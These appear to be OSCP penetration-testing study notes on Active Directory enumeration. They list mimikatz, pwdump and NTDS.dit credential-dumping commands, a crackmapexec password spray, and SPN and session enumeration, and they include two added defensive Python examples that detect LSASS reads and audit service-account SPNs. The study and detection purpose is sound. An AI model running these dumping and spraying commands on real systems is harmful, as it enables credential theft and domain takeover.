OSCP Notes


Users / Groups / Computers
  • Look for users with high privileges across the domain, e.g. Domain Admins or derivative local admins.
  • Look for custom groups.
# get all users in the domain (are there any weird domains?)
cmd> net user /domain
cmd> net user [username] /domain
# get all groups in the domain
cmd> net group /domain
cmd> net group [groupname] /domain
# get all computers in domain
cmd> net view
cmd> net view /domain
# get resources/shares of specified computer
cmd> net view \\[computer_name] /domain
If you can't get all the domain member info, check your privileges (whoami /priv).
Check whether UAC is enabled (if you can't run executables you uploaded, such as mimikatz).

Plaintext creds? (low-hanging fruit) > Password spray?

  • WinPEAS may reveal plaintext passwords.
When dumping creds, if mimikatz wasn't launched as SYSTEM, run privilege::debug
and then token::elevate first.
# dump NTLM hashes + plaintext creds
mimikatz > lsadump::sam # dump contents of SAM db in current host
mimikatz > sekurlsa::logonpasswords # dump creds of logged-on users
Other tools
cmd> pwdump.exe localhost
cmd> fgdump.exe localhost # improved pwdump; shuts down firewalls first
cmd> type C:\Windows\NTDS\NTDS.dit # all domain hashes live in NTDS.dit on the Domain Controller
Are there any patterns in users' passwords? Can we build a password list and do a password spray?
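sekurlsa::logonpasswords reads credential material straight out of LSASS memory, so the defender's counterpart to this step is watching which processes open LSASS. The following is an added example, not part of these notes: it runs over constructed Sysmon Event ID 10 (ProcessAccess) records in a JSON-lines form and flags any non-allowlisted process that obtains PROCESS_VM_READ on lsass.exe. The allowlist, image paths and GrantedAccess values are assumptions for the sample.

```python
"""Flag processes that read LSASS memory, from Sysmon ProcessAccess (Event ID 10) records."""
import json

# Constructed Sysmon Event 10 records (field names as Sysmon emits them:
# SourceImage, TargetImage, GrantedAccess); the values are made up for the sample.
SAMPLE_LOG = r"""
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Users\\bob\\Downloads\\tool.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}
{"EventID": 10, "SourceImage": "C:\\Program Files\\App\\app.exe", "TargetImage": "C:\\Program Files\\App\\helper.exe", "GrantedAccess": "0x1010"}
"""

# Access right a process needs to read another process's memory.
PROCESS_VM_READ = 0x0010

# Hypothetical allowlist of system components that legitimately open LSASS on
# this host. Assumption for the example; tune it per environment.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}


def parse_sysmon(text):
    """Parse JSON-lines Sysmon records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def lsass_readers(events, allowlist=ALLOWLIST):
    """Return the Event 10 records where a non-allowlisted process opened
    lsass.exe with a handle that includes PROCESS_VM_READ."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 10:
            continue
        if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
            continue
        granted = int(ev["GrantedAccess"], 16)
        if not granted & PROCESS_VM_READ:
            continue  # e.g. 0x1000 (query limited info) is routine and noisy
        source = ev["SourceImage"]
        if source.lower() in allowlist:
            continue
        hits.append({"source": source, "granted_access": hex(granted)})
    return hits


if __name__ == "__main__":
    for hit in lsass_readers(parse_sysmon(SAMPLE_LOG)):
        print(f"LSASS read by {hit['source']} (GrantedAccess {hit['granted_access']})")
```

Only the download-folder binary is reported: csrss.exe is allowlisted, svchost.exe asked for a handle without VM_READ, and app.exe opened a different target. The same rule catches any tool that dumps LSASS, not only mimikatz, which is why the check is on the access mask rather than the process name.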
crackmapexec smb IP -u user.txt -p pass.txt --continue-on-success
Then try RDP
rdesktop -r disk:tmp=/home/kali/transfer -u domain_name\\user_name -p Password IP_addr
  • With the -r disk: option the local directory is exposed to the RDP session as a share, so files can be transferred in both directions. It's super useful.


Service Principal Names (AD Service Accounts)
  • A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
  • Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
  • Query the Domain Controller in search of SPNs.
  • SPN Examples
    • CIFS/MYCOMPUTER$ - file share access.
    • LDAP/MYCOMPUTER$ - querying AD info via LDAP.
    • HTTP/MYCOMPUTER$ - Web services such as IIS.
  • Run nslookup on the service hostname to see whether it resolves to a reachable entry point.
  • Automated SPN enum scripts:
# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
PS> .\GetUserSPNs.ps1
# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
PS> .\Get-SPN.ps1
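The SPN examples above all follow the same grammar, serviceclass/host[:port][/servicename], and the scripts listed simply query the servicePrincipalName attribute and print it. The following is an added example, not code from these notes or from either script: a parser for that grammar, plus a grouping step that separates SPNs held by machine accounts (trailing $) from those held by ordinary user accounts, which is the set a defender audits first for password strength, rotation, or migration to gMSA. The sample account names, hostnames and the default-port table are assumptions.

```python
"""Parse Service Principal Names and pick out user-held service accounts."""
import re
from collections import defaultdict

# SPN grammar: serviceclass/host[:port_or_instance][/servicename]
SPN_RE = re.compile(
    r"^(?P<service_class>[^/:]+)/(?P<host>[^/:]+)"
    r"(?::(?P<port_or_instance>[^/]+))?"
    r"(?:/(?P<service_name>.+))?$"
)

# Assumption: an SPN with no explicit port refers to the protocol's default
# port. Confirm with nslookup and a port check before relying on it.
DEFAULT_PORTS = {"CIFS": 445, "LDAP": 389, "HTTP": 80, "MSSQLSVC": 1433}


def parse_spn(spn):
    """Split an SPN into service_class, host, port, instance, service_name.
    Raises ValueError on input that does not match the grammar."""
    m = SPN_RE.match(spn)
    if not m:
        raise ValueError(f"not a valid SPN: {spn!r}")
    parts = m.groupdict()
    port_or_instance = parts.pop("port_or_instance")
    port, instance = None, None
    if port_or_instance is None:
        port = DEFAULT_PORTS.get(parts["service_class"].upper())
    elif port_or_instance.isdigit():
        port = int(port_or_instance)
    else:
        instance = port_or_instance  # e.g. a named SQL instance; port not in the SPN
    return {**parts, "port": port, "instance": instance}


# Constructed (sAMAccountName, servicePrincipalName) pairs, shaped like the
# output of an LDAP query for servicePrincipalName. Names are placeholders.
SAMPLE_SPNS = [
    ("MYCOMPUTER$", "CIFS/MYCOMPUTER$"),
    ("WEB01$", "HTTP/web01.corp.example"),
    ("DC01$", "LDAP/dc01.corp.example"),
    ("DC01$", "LDAP/dc01.corp.example:3268"),
    ("svc_sql", "MSSQLSvc/sql01.corp.example:1433"),
    ("svc_sql", "MSSQLSvc/sql01.corp.example:SQLEXPRESS"),
    ("svc_web", "HTTP/intranet.corp.example/intranet"),
]


def user_service_accounts(pairs):
    """Group parsed SPNs by account and keep only non-machine accounts.
    Machine accounts (trailing '$') rotate their passwords automatically;
    user accounts holding SPNs do not, so their password policy is what to audit."""
    by_account = defaultdict(list)
    for account, spn in pairs:
        by_account[account].append(parse_spn(spn))
    return {acct: spns for acct, spns in by_account.items() if not acct.endswith("$")}


if __name__ == "__main__":
    for account, spns in user_service_accounts(SAMPLE_SPNS).items():
        for spn in spns:
            print(account, spn["service_class"], spn["host"], spn["port"], spn["instance"])
```

Note the MSSQLSvc case: the part after the colon is a named instance rather than a port, so the parser reports the instance and leaves the port unknown instead of guessing 1433.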
Logged-in users and active user sessions.
PS> Set-ExecutionPolicy Unrestricted
PS> Import-Module .\PowerView.ps1
PS> Get-NetLoggedon -ComputerName [computer_name] # enum logged-in users
PS> Get-NetSession -ComputerName [domain_controller] # enum active user sessions

Domain Controller hostname (PdcRoleOwner)
PS> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()